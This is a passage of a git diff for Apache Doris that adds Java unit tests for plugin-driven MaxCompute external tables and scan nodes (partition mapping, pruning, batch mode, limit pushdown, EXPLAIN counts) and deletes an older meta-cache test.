pruning, or filtered " + + "queries silently return zero rows (FIX-NONPART-PRUNE-DATALOSS)"); + } + + // ==================== getNameToPartitionItems (raw remote-name addressing) ==================== + + @Test + public void testGetNameToPartitionItemsBuildsFromConnectorByRemoteNames() { + // Doris (local/mapped) partition column names differ from the RAW remote names, so a + // mutation indexing the connector's raw-keyed value map by the local names would miss. + List schema = Arrays.asList( + new Column("year", PrimitiveType.INT), + new Column("month", PrimitiveType.INT), + new Column("val", PrimitiveType.INT)); + List partitionColumns = Arrays.asList(schema.get(0), schema.get(1)); + PluginDrivenSchemaCacheValue cacheValue = new PluginDrivenSchemaCacheValue( + schema, partitionColumns, Arrays.asList("YEAR", "MONTH")); + + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + ConnectorTableHandle handle = Mockito.mock(ConnectorTableHandle.class); + TestablePluginCatalog catalog = new TestablePluginCatalog("max_compute", metadata, session); + ExternalDatabase db = mockDb("REMOTE_DB"); + Mockito.when(metadata.getTableHandle(session, "REMOTE_DB", "REMOTE_TBL")) + .thenReturn(Optional.of(handle)); + Mockito.when(metadata.listPartitions(Mockito.eq(session), Mockito.eq(handle), Mockito.any())) + .thenReturn(Arrays.asList( + partition("YEAR=2024/MONTH=1", "2024", "1"), + partition("YEAR=2023/MONTH=2", "2023", "2"))); + + PluginDrivenExternalTable table = tableWithCacheValue(cacheValue, catalog, db, "REMOTE_TBL"); + + Map items = table.getNameToPartitionItems(Optional.empty()); + + Assertions.assertEquals(2, items.size()); + assertPartition(items, "YEAR=2024/MONTH=1", "2024", "1"); + assertPartition(items, "YEAR=2023/MONTH=2", "2023", "2"); + // WHY: addressing must use the RAW remote names; if it used the local "year"/"month" the + // raw-keyed value map lookups would return null and partition-key construction would break. + Mockito.verify(metadata).getTableHandle(session, "REMOTE_DB", "REMOTE_TBL"); + } + + @Test + public void testGetNameToPartitionItemsEmptyWhenNotPartitioned() { + PluginDrivenSchemaCacheValue cacheValue = new PluginDrivenSchemaCacheValue( + Collections.singletonList(new Column("val", PrimitiveType.INT)), + Collections.emptyList(), Collections.emptyList()); + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + TestablePluginCatalog catalog = new TestablePluginCatalog( + "max_compute", metadata, Mockito.mock(ConnectorSession.class)); + PluginDrivenExternalTable table = tableWithCacheValue( + cacheValue, catalog, mockDb("REMOTE_DB"), "REMOTE_TBL"); + + Assertions.assertTrue(table.getNameToPartitionItems(Optional.empty()).isEmpty()); + Mockito.verifyNoInteractions(metadata); + } + + // ==================== initSchema partition extraction (raw -> mapped bridge) ==================== + + @Test + public void testInitSchemaExtractsPartitionColumnsMappingRemoteNames() { + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + ConnectorTableHandle handle = Mockito.mock(ConnectorTableHandle.class); + TestablePluginCatalog catalog = new TestablePluginCatalog("max_compute", metadata, session); + ExternalDatabase db = mockDb("REMOTE_DB"); + + Mockito.when(metadata.getTableHandle(session, "REMOTE_DB", "REMOTE_TBL")) + .thenReturn(Optional.of(handle)); + // Connector schema: raw remote column names; partition_columns prop lists RAW names. + ConnectorTableSchema tableSchema = new ConnectorTableSchema( + "REMOTE_TBL", + Arrays.asList( + new ConnectorColumn("YEAR", ConnectorType.of("INT"), "", true, null), + new ConnectorColumn("REGION", ConnectorType.of("INT"), "", true, null), + new ConnectorColumn("VAL", ConnectorType.of("INT"), "", true, null)), + "max_compute", + Collections.singletonMap("partition_columns", "YEAR,REGION")); + Mockito.when(metadata.getTableSchema(session, handle)).thenReturn(tableSchema); + // Identifier mapping lowercases the remote names (raw "YEAR" -> mapped "year"). + Mockito.when(metadata.fromRemoteColumnName(Mockito.eq(session), Mockito.anyString(), + Mockito.anyString(), Mockito.anyString())) + .thenAnswer(inv -> ((String) inv.getArgument(3)).toLowerCase()); + + PluginDrivenExternalTable table = bareTable(catalog, db, "REMOTE_TBL"); + Optional result = table.initSchema(); + + Assertions.assertTrue(result.isPresent()); + Assertions.assertTrue(result.get() instanceof PluginDrivenSchemaCacheValue); + PluginDrivenSchemaCacheValue value = (PluginDrivenSchemaCacheValue) result.get(); + Assertions.assertEquals(Arrays.asList("year", "region", "val"), columnNames(value.getSchema())); + // WHY: partition columns are matched after mapping raw->local; a mutation that matched by the + // RAW name would find nothing (schema holds mapped "year"/"region") and drop the partitions. + Assertions.assertEquals(Arrays.asList("year", "region"), columnNames(value.getPartitionColumns()), + "partition columns must be the MAPPED Doris columns identified via fromRemoteColumnName"); + Assertions.assertEquals(Arrays.asList("YEAR", "REGION"), value.getPartitionColumnRemoteNames(), + "remote names must be kept raw for addressing connector partition values"); + } + + @Test + public void testInitSchemaNoPartitionsWhenPropAbsent() { + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + ConnectorTableHandle handle = Mockito.mock(ConnectorTableHandle.class); + TestablePluginCatalog catalog = new TestablePluginCatalog("max_compute", metadata, session); + Mockito.when(metadata.getTableHandle(session, "REMOTE_DB", "REMOTE_TBL")) + .thenReturn(Optional.of(handle)); + Mockito.when(metadata.getTableSchema(session, handle)).thenReturn(new ConnectorTableSchema( + "REMOTE_TBL", + Collections.singletonList(new ConnectorColumn("c", ConnectorType.of("INT"), "", true, null)), + "max_compute", + Collections.emptyMap())); + Mockito.when(metadata.fromRemoteColumnName(Mockito.any(), Mockito.any(), Mockito.any(), Mockito.any())) + .thenAnswer(inv -> inv.getArgument(3)); + + PluginDrivenExternalTable table = bareTable(catalog, mockDb("REMOTE_DB"), "REMOTE_TBL"); + Optional result = table.initSchema(); + + Assertions.assertTrue(result.get() instanceof PluginDrivenSchemaCacheValue); + Assertions.assertTrue(((PluginDrivenSchemaCacheValue) result.get()).getPartitionColumns().isEmpty()); + } + + // ==================== helpers ==================== + + private static ConnectorPartitionInfo partition(String name, String year, String month) { + Map values = new LinkedHashMap<>(); + values.put("YEAR", year); + values.put("MONTH", month); + return new ConnectorPartitionInfo(name, values, Collections.emptyMap()); + } + + private static void assertPartition(Map items, String name, + String year, String month) { + PartitionItem item = items.get(name); + Assertions.assertNotNull(item, "missing partition " + name); + Assertions.assertTrue(item instanceof ListPartitionItem); + PartitionKey key = ((ListPartitionItem) item).getItems().get(0); + Assertions.assertEquals(year, key.getKeys().get(0).getStringValue(), + "partition value for the first (year) column must come from the YEAR remote key"); + Assertions.assertEquals(month, key.getKeys().get(1).getStringValue(), + "partition value for the second (month) column must come from the MONTH remote key"); + } + + private static List columnNames(List columns) { + List names = new ArrayList<>(columns.size()); + for (Column c : columns) { + names.add(c.getName()); + } + return names; + } + + /** Table whose schema-cache lookup returns the given value; not backed by a real connector. */ + private static PluginDrivenExternalTable tableWithCacheValue(SchemaCacheValue cacheValue) { + return tableWithCacheValue(cacheValue, + new TestablePluginCatalog("max_compute", Mockito.mock(ConnectorMetadata.class), + Mockito.mock(ConnectorSession.class)), + mockDb("REMOTE_DB"), "REMOTE_TBL"); + } + + private static PluginDrivenExternalTable tableWithCacheValue(SchemaCacheValue cacheValue, + PluginDrivenExternalCatalog catalog, ExternalDatabase db, String remoteName) { + return new PluginDrivenExternalTable(1L, "tbl", remoteName, catalog, db) { + @Override + protected synchronized void makeSureInitialized() { + // no-op: skip Env-backed catalog/db init + } + + @Override + public Optional getSchemaCacheValue() { + return Optional.of(cacheValue); + } + }; + } + + /** Table that drives the real initSchema(); does not stub the schema cache. */ + private static PluginDrivenExternalTable bareTable(PluginDrivenExternalCatalog catalog, + ExternalDatabase db, String remoteName) { + return new PluginDrivenExternalTable(1L, "tbl", remoteName, catalog, db) { + @Override + protected synchronized void makeSureInitialized() { + // no-op + } + }; + } + + @SuppressWarnings("unchecked") + private static ExternalDatabase mockDb(String remoteName) { + ExternalDatabase db = Mockito.mock(ExternalDatabase.class); + Mockito.when(db.getRemoteName()).thenReturn(remoteName); + return db; + } + + /** + * Minimal PluginDrivenExternalCatalog that returns a fixed connector/session without standing + * up the Doris environment (mirrors the pattern in PluginDrivenExternalTableEngineTest). + */ + private static class TestablePluginCatalog extends PluginDrivenExternalCatalog { + private final Connector connector; + private final ConnectorSession session; + + TestablePluginCatalog(String catalogType, ConnectorMetadata metadata, ConnectorSession session) { + this(catalogType, mockConnector(metadata, session), session); + } + + private TestablePluginCatalog(String catalogType, Connector connector, ConnectorSession session) { + super(1L, "test-catalog", null, makeProps(catalogType), "", connector); + this.connector = connector; + this.session = session; + } + + private static Connector mockConnector(ConnectorMetadata metadata, ConnectorSession session) { + Connector c = Mockito.mock(Connector.class); + Mockito.when(c.getMetadata(session)).thenReturn(metadata); + return c; + } + + @Override + public Connector getConnector() { + return connector; + } + + @Override + public ConnectorSession buildConnectorSession() { + return session; + } + + @Override + protected List listDatabaseNames() { + return Collections.emptyList(); + } + + @Override + protected List listTableNamesFromRemote(SessionContext ctx, String dbName) { + return Collections.emptyList(); + } + + @Override + public boolean tableExist(SessionContext ctx, String dbName, String tblName) { + return false; + } + + private static Map makeProps(String type) { + Map props = new HashMap<>(); + props.put("type", type); + return props; + } + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeBatchModeTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeBatchModeTest.java new file mode 100644 index 00000000000000..77f85faf10660e --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeBatchModeTest.java @@ -0,0 +1,129 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.catalog.PartitionItem; +import org.apache.doris.nereids.trees.plans.logical.LogicalFileScan.SelectedPartitions; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.LinkedHashMap; +import java.util.Map; + +/** + * FIX-BATCH-MODE-SPLIT (P4-T06e / NG-7) — guards {@link PluginDrivenScanNode#shouldUseBatchMode}, + * the pure four-input gate deciding whether a plugin-driven partitioned scan uses batched/streaming + * split generation instead of synchronous enumeration. + * + *

Why this matters: batch mode mirrors legacy {@code MaxComputeScanNode.isBatchMode()}. + * Getting any gate wrong has real consequences: enabling batch when it should not (e.g. dropping the + * "must be pruned" or "must have files" guard) spins up async read sessions for the wrong tables; + * disabling it when it should fire (e.g. an off-by-one on the partition-count threshold) silently + * regresses large-partition scans back to slow synchronous planning + large single sessions (the + * exact OOM/latency risk this fix removes). The connector {@code fileNum > 0} check is folded into + * the {@code supportsBatchScan} input.

+ * + *

Coverage scope: these tests pin the PURE static gate only. The wiring method + * {@code computeBatchMode} — including its {@code scanProvider != null} null-guard (SF-1), which + * maps a provider-less connector to {@code supportsBatchScan=false} — is NOT exercised here + * (constructing a {@code PluginDrivenScanNode} needs a harness this module lacks). That null-guard + * and the async {@code startSplit} path are live-only / DV-019 gaps.

+ */ +public class PluginDrivenScanNodeBatchModeTest { + + private static final int THRESHOLD = 1024; // num_partitions_in_batch_mode default; pinned (it is fuzzy at runtime) + + private static SelectedPartitions pruned(int count) { + Map items = new LinkedHashMap<>(); + for (int i = 0; i < count; i++) { + items.put("pt=" + i, Mockito.mock(PartitionItem.class)); + } + return new SelectedPartitions(count, items, true); + } + + @Test + public void testNotPrunedNeverBatches() { + // NOT_PRUNED = non-partitioned / pruning not applied -> never batch. NOTE: NOT_PRUNED carries + // an EMPTY map, so this case is non-discriminating for the !isPruned guard alone (0 >= THRESHOLD + // is false regardless); the guard mutant is killed by testUnprocessedPruningNeverBatches + // (populated map). This test documents the legacy NOT_PRUNED singleton path. + Assertions.assertFalse( + PluginDrivenScanNode.shouldUseBatchMode(SelectedPartitions.NOT_PRUNED, true, true, THRESHOLD)); + } + + @Test + public void testNullSelectionNeverBatches() { + Assertions.assertFalse(PluginDrivenScanNode.shouldUseBatchMode(null, true, true, THRESHOLD)); + } + + @Test + public void testUnprocessedPruningNeverBatches() { + // isPruned=false with a populated map is "pruning not processed" -> not batch. Pins the + // !isPruned guard: dropping it would batch on an unpruned (effectively full) selection. + Map items = new LinkedHashMap<>(); + for (int i = 0; i < THRESHOLD; i++) { + items.put("pt=" + i, Mockito.mock(PartitionItem.class)); + } + SelectedPartitions notProcessed = new SelectedPartitions(THRESHOLD, items, false); + Assertions.assertFalse(PluginDrivenScanNode.shouldUseBatchMode(notProcessed, true, true, THRESHOLD)); + } + + @Test + public void testNoSlotsNeverBatches() { + // No required slots (e.g. count-only) -> not batch. Pins the hasSlots guard. + Assertions.assertFalse(PluginDrivenScanNode.shouldUseBatchMode(pruned(THRESHOLD), false, true, THRESHOLD)); + } + + @Test + public void testConnectorWithoutBatchSupportNeverBatches() { + // supportsBatchScan=false -> not batch. Pins the supportsBatchScan guard. (A null scan provider + // also resolves to supportsBatchScan=false, but that mapping lives in computeBatchMode's + // null-guard and is NOT exercised by this static-helper test — see DV-019.) + Assertions.assertFalse(PluginDrivenScanNode.shouldUseBatchMode(pruned(THRESHOLD), true, false, THRESHOLD)); + } + + @Test + public void testZeroThresholdDisablesBatch() { + // num_partitions_in_batch_mode == 0 disables batch mode entirely (legacy contract). Pins the + // `numPartitionsInBatchMode > 0` guard: with `>= 0` a zero threshold would wrongly batch. + Assertions.assertFalse(PluginDrivenScanNode.shouldUseBatchMode(pruned(THRESHOLD), true, true, 0)); + } + + @Test + public void testBelowThresholdDoesNotBatch() { + // Fewer pruned partitions than the threshold -> synchronous path (small scans need no batching). + Assertions.assertFalse( + PluginDrivenScanNode.shouldUseBatchMode(pruned(THRESHOLD - 1), true, true, THRESHOLD)); + } + + @Test + public void testAtThresholdBatches() { + // size == threshold is INCLUSIVE (legacy uses >=). Pins the boundary: a `>` mutant fails here. + Assertions.assertTrue( + PluginDrivenScanNode.shouldUseBatchMode(pruned(THRESHOLD), true, true, THRESHOLD)); + } + + @Test + public void testAboveThresholdBatches() { + // The main success case: a large pruned partition set on a file-bearing, sloted, pruned table. + Assertions.assertTrue( + PluginDrivenScanNode.shouldUseBatchMode(pruned(THRESHOLD + 5), true, true, THRESHOLD)); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeLimitStripTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeLimitStripTest.java new file mode 100644 index 00000000000000..d37cea96a9884c --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodeLimitStripTest.java @@ -0,0 +1,54 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +/** + * FIX-CAST-PUSHDOWN (F9) impl-review F9-LIMITOPT-1 — guards + * {@link PluginDrivenScanNode#effectiveSourceLimit}, which suppresses source-side LIMIT pushdown when + * non-pushable (CAST) conjuncts were stripped from the filter. + * + *

Why this matters: the F9 fix makes MaxCompute strip CAST conjuncts before pushdown, so + * the connector sees a filter that no longer reflects them. If the real LIMIT were still pushed, the + * source (e.g. MaxCompute's row-offset limit-split optimization, which fires on an empty/partition-only + * filter) could return the first N rows without applying the stripped predicate; BE then re-evaluates + * the CAST predicate only on those rows and silently UNDER-returns (BE can filter the returned rows + * down, never recover rows the source never returned). Passing {@code -1} (no source limit) when a + * conjunct was stripped mirrors legacy, which disabled limit-split whenever a non-partition-equality + * (incl. CAST) predicate was present. BE still applies the LIMIT.

+ */ +public class PluginDrivenScanNodeLimitStripTest { + + @Test + public void strippedConjunctsSuppressSourceLimit() { + // The load-bearing case: a CAST conjunct was stripped, so the source must NOT apply the LIMIT + // (else under-return). Must return -1 regardless of the real limit. + Assertions.assertEquals(-1L, PluginDrivenScanNode.effectiveSourceLimit(10L, true)); + Assertions.assertEquals(-1L, PluginDrivenScanNode.effectiveSourceLimit(1L, true)); + } + + @Test + public void noStripPassesLimitThrough() { + // No conjunct stripped -> the real limit flows to the source (legitimate limit pushdown, + // e.g. limit-opt on a genuinely empty/partition-equality filter). + Assertions.assertEquals(10L, PluginDrivenScanNode.effectiveSourceLimit(10L, false)); + Assertions.assertEquals(-1L, PluginDrivenScanNode.effectiveSourceLimit(-1L, false)); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionCountTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionCountTest.java new file mode 100644 index 00000000000000..115f96b378c8ee --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionCountTest.java @@ -0,0 +1,100 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.catalog.PartitionItem; +import org.apache.doris.nereids.trees.plans.logical.LogicalFileScan.SelectedPartitions; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.Collections; +import java.util.LinkedHashMap; +import java.util.Map; + +/** + * FIX-EXPLAIN-PARTITION-COUNT — guards {@link PluginDrivenScanNode#displayPartitionCounts}, which + * derives the EXPLAIN {@code partition=N/M} counts (also fed to SQL-block-rule enforcement via + * {@code getSelectedPartitionNum()}) from the Nereids {@link SelectedPartitions}. + * + *

Why this matters / the bug this pins: the gate is {@code != NOT_PRUNED}, deliberately NOT + * {@code isPruned}. A partitioned table queried WITHOUT a partition predicate keeps the initial + * all-partitions selection from {@code ExternalTable.initSelectedPartitions} — {@code isPruned=false} + * but a full, non-{@code NOT_PRUNED} map ({@code PruneFileScanPartition} only runs under a + * {@code LogicalFilter}, so a no-WHERE / non-partition-predicate query never flips {@code isPruned}). + * It must still report {@code partition=total/total} (e.g. {@code SELECT * FROM t} over 2 partitions + * → {@code 2/2}). An {@code isPruned} gate regressed this to {@code 0/0} + * ({@code test_max_compute_partition_prune}'s {@code one_partition_3_all} et al.). The contrast with + * the connector pushdown gate ({@code resolveRequiredPartitions}, which correctly stays {@code + * isPruned} — an unpruned scan reads ALL partitions and pushes no restriction) is the load-bearing + * subtlety: the same {@code SelectedPartitions} maps to DIFFERENT answers for "what to display" vs + * "what to push down".

+ */ +public class PluginDrivenScanNodePartitionCountTest { + + private static Map items(int count) { + Map items = new LinkedHashMap<>(); + for (int i = 0; i < count; i++) { + items.put("pt=" + i, Mockito.mock(PartitionItem.class)); + } + return items; + } + + @Test + public void testNotPrunedSentinelShowsNoCounts() { + // NOT_PRUNED = non-partitioned / pruning unsupported -> leave the fields at default (0/0), as + // legacy did (its display gate was `!= NOT_PRUNED`). Returning [0,0] here would be acceptable + // numerically but null keeps "nothing to show" distinct from a genuine 0-partition selection. + Assertions.assertNull(PluginDrivenScanNode.displayPartitionCounts(SelectedPartitions.NOT_PRUNED)); + } + + @Test + public void testNullShowsNoCounts() { + Assertions.assertNull(PluginDrivenScanNode.displayPartitionCounts(null)); + } + + @Test + public void testNoPartitionPredicateReportsAllOverAll() { + // THE regression guard: a partitioned table with NO partition predicate keeps the initial + // all-partitions selection (isPruned=FALSE, full map). It must report total/total (2/2), NOT + // 0/0. A mutation reverting the gate to `isPruned` makes this red — exactly the bug that showed + // `partition=0/0` for `SELECT * FROM one_partition_tb`. + SelectedPartitions allPartitions = new SelectedPartitions(2, items(2), false); + Assertions.assertArrayEquals(new long[] {2, 2}, + PluginDrivenScanNode.displayPartitionCounts(allPartitions)); + } + + @Test + public void testPrunedSubsetReportsSelectedOverTotal() { + // Pruned to 2 of 5 partitions -> selected=2 (map size), total=5 (totalPartitionNum). + SelectedPartitions pruned = new SelectedPartitions(5, items(2), true); + Assertions.assertArrayEquals(new long[] {2, 5}, + PluginDrivenScanNode.displayPartitionCounts(pruned)); + } + + @Test + public void testPrunedToZeroReportsZeroOverTotal() { + // Pruned away every partition (e.g. WHERE part=) -> 0/total, NOT 0/0. Pins that + // total comes from totalPartitionNum (kept even when the surviving map is empty), and that this + // value is produced BEFORE getSplits()'s pruned-to-zero short-circuit so EXPLAIN still shows it. + SelectedPartitions prunedToZero = new SelectedPartitions(2, Collections.emptyMap(), true); + Assertions.assertArrayEquals(new long[] {0, 2}, + PluginDrivenScanNode.displayPartitionCounts(prunedToZero)); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionPruningTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionPruningTest.java new file mode 100644 index 00000000000000..4b4cec4ecdb0cd --- /dev/null +++ b/fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenScanNodePartitionPruningTest.java @@ -0,0 +1,109 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.datasource; + +import org.apache.doris.catalog.PartitionItem; +import org.apache.doris.nereids.trees.plans.logical.LogicalFileScan.SelectedPartitions; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; +import org.mockito.Mockito; + +import java.util.Arrays; +import java.util.Collections; +import java.util.LinkedHashMap; +import java.util.List; +import java.util.Map; + +/** + * FIX-PRUNE-PUSHDOWN (P4-T06e / DG-1) — guards {@link PluginDrivenScanNode#resolveRequiredPartitions}, + * the three-state mapping from the Nereids {@code SelectedPartitions} to the partition list pushed + * down to the connector SPI. + * + *

Why this matters: before this fix the plugin-driven MaxCompute read path dropped the + * pruned partition set entirely, so the ODPS read session spanned ALL partitions (full-scan + * perf/memory regression). The fix threads the pruned set through, but the null-vs-empty distinction + * is load-bearing and easy to get wrong:

+ *
    + *
  • {@code null} = "not pruned, scan all" — must NOT be confused with the short-circuit case, + * or every row would be silently dropped;
  • + *
  • non-empty list = "scan only these" — must be forwarded, or large tables regress to a full + * scan;
  • + *
  • empty list = "pruned to zero partitions" — must be distinguishable (non-null) so + * {@code getSplits()} can short-circuit with no splits, mirroring legacy + * {@code MaxComputeScanNode.getSplits():724-727}.
  • + *
+ */ +public class PluginDrivenScanNodePartitionPruningTest { + + @Test + public void testNotPrunedScansAllPartitions() { + // NOT_PRUNED -> null (scan all). Returning [] here would be read as "pruned to zero" and + // silently drop all rows. + Assertions.assertNull( + PluginDrivenScanNode.resolveRequiredPartitions(SelectedPartitions.NOT_PRUNED)); + } + + @Test + public void testNullSelectionScansAllPartitions() { + Assertions.assertNull(PluginDrivenScanNode.resolveRequiredPartitions(null)); + } + + @Test + public void testUnprocessedPruningScansAllPartitions() { + // isPruned=false with a populated map is still "pruning not processed" -> scan all. + Map items = new LinkedHashMap<>(); + items.put("pt=1", Mockito.mock(PartitionItem.class)); + SelectedPartitions notProcessed = new SelectedPartitions(3, items, false); + Assertions.assertNull(PluginDrivenScanNode.resolveRequiredPartitions(notProcessed)); + } + + @Test + public void testPrunedSubsetForwardsPartitionNames() { + // Pruned non-empty set must be forwarded; otherwise the connector reads all partitions. + Map items = new LinkedHashMap<>(); + items.put("pt=1", Mockito.mock(PartitionItem.class)); + items.put("pt=2,region=cn", Mockito.mock(PartitionItem.class)); + SelectedPartitions pruned = new SelectedPartitions(5, items, true); + + List result = PluginDrivenScanNode.resolveRequiredPartitions(pruned); + + Assertions.assertNotNull(result); + Assertions.assertEquals(2, result.size()); + Assertions.assertTrue(result.containsAll(Arrays.asList("pt=1", "pt=2,region=cn"))); + } + + @Test + public void testPrunedToZeroReturnsEmptyNonNullForShortCircuit() { + // Pruned to zero partitions -> non-null empty list, distinct from the null "scan all" + // case, so getSplits() can short-circuit and read nothing. + // NOTE (FIX-NONPART-PRUNE-DATALOSS): this isPruned=true+empty state is correct ONLY when it + // comes from a genuinely PARTITIONED table whose predicates pruned away every partition + // (e.g. WHERE pt='nonexistent'). A NON-partitioned table must never reach this state, or the + // short-circuit silently drops all rows; PluginDrivenExternalTable.supportInternalPartitionPruned() + // returns unconditional true precisely so PruneFileScanPartition leaves non-partitioned tables + // NOT_PRUNED (see PluginDrivenExternalTablePartitionTest + // #testNonPartitionedTableReportsNoPartitionsButStillOptsIntoPruning). + SelectedPartitions emptyPruned = new SelectedPartitions(5, Collections.emptyMap(), true); + + List result = PluginDrivenScanNode.resolveRequiredPartitions(emptyPruned); + + Assertions.assertNotNull(result); + Assertions.assertTrue(result.isEmpty()); + } +} diff --git a/fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalMetaCacheTest.java b/fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalMetaCacheTest.java deleted file mode 100644 index dd99b578c4a335..00000000000000 --- a/fe/fe-core/src/test/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalMetaCacheTest.java +++ /dev/null @@ -1,139 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute; - -import org.apache.doris.catalog.Type; -import org.apache.doris.common.Config; -import org.apache.doris.datasource.NameMapping; -import org.apache.doris.datasource.SchemaCacheKey; -import org.apache.doris.datasource.SchemaCacheValue; -import org.apache.doris.datasource.TablePartitionValues; -import org.apache.doris.datasource.metacache.MetaCacheEntry; -import org.apache.doris.datasource.metacache.MetaCacheEntryStats; - -import org.junit.Assert; -import org.junit.Test; - -import java.util.Collections; -import java.util.Map; -import java.util.concurrent.ExecutorService; -import java.util.concurrent.Executors; - -public class MaxComputeExternalMetaCacheTest { - - @Test - public void testPartitionValuesLoadFromSchemaEntryInsideEngineCache() { - ExecutorService executor = Executors.newSingleThreadExecutor(); - try { - MaxComputeExternalMetaCache cache = new MaxComputeExternalMetaCache(executor); - long catalogId = 1L; - cache.initCatalog(catalogId, Collections.emptyMap()); - - NameMapping table = new NameMapping(catalogId, "db1", "tbl1", "remote_db1", "remote_tbl1"); - MetaCacheEntry schemaEntry = cache.entry( - catalogId, MaxComputeExternalMetaCache.ENTRY_SCHEMA, SchemaCacheKey.class, SchemaCacheValue.class); - schemaEntry.put(new SchemaCacheKey(table), new MaxComputeSchemaCacheValue( - Collections.emptyList(), - null, - null, - Collections.singletonList("pt"), - Collections.singletonList("pt=20250101"), - Collections.emptyList(), - Collections.singletonList(Type.INT), - Collections.emptyMap())); - - TablePartitionValues partitionValues = cache.getPartitionValues(table); - - Assert.assertEquals(1, partitionValues.getPartitionNameToIdMap().size()); - Assert.assertTrue(partitionValues.getPartitionNameToIdMap().containsKey("pt=20250101")); - } finally { - executor.shutdownNow(); - } - } - - @Test - public void testInvalidateTablePrecise() { - ExecutorService executor = Executors.newSingleThreadExecutor(); - try { - MaxComputeExternalMetaCache cache = new MaxComputeExternalMetaCache(executor); - long catalogId = 1L; - cache.initCatalog(catalogId, Collections.emptyMap()); - - NameMapping t1 = new NameMapping(catalogId, "db1", "tbl1", "remote_db1", "remote_tbl1"); - NameMapping t2 = new NameMapping(catalogId, "db1", "tbl2", "remote_db1", "remote_tbl2"); - - MetaCacheEntry partitionEntry = cache.entry( - catalogId, - MaxComputeExternalMetaCache.ENTRY_PARTITION_VALUES, - NameMapping.class, - TablePartitionValues.class); - partitionEntry.put(t1, new TablePartitionValues()); - partitionEntry.put(t2, new TablePartitionValues()); - - cache.invalidateTable(catalogId, "db1", "tbl1"); - - Assert.assertNull(partitionEntry.getIfPresent(t1)); - Assert.assertNotNull(partitionEntry.getIfPresent(t2)); - } finally { - executor.shutdownNow(); - } - } - - 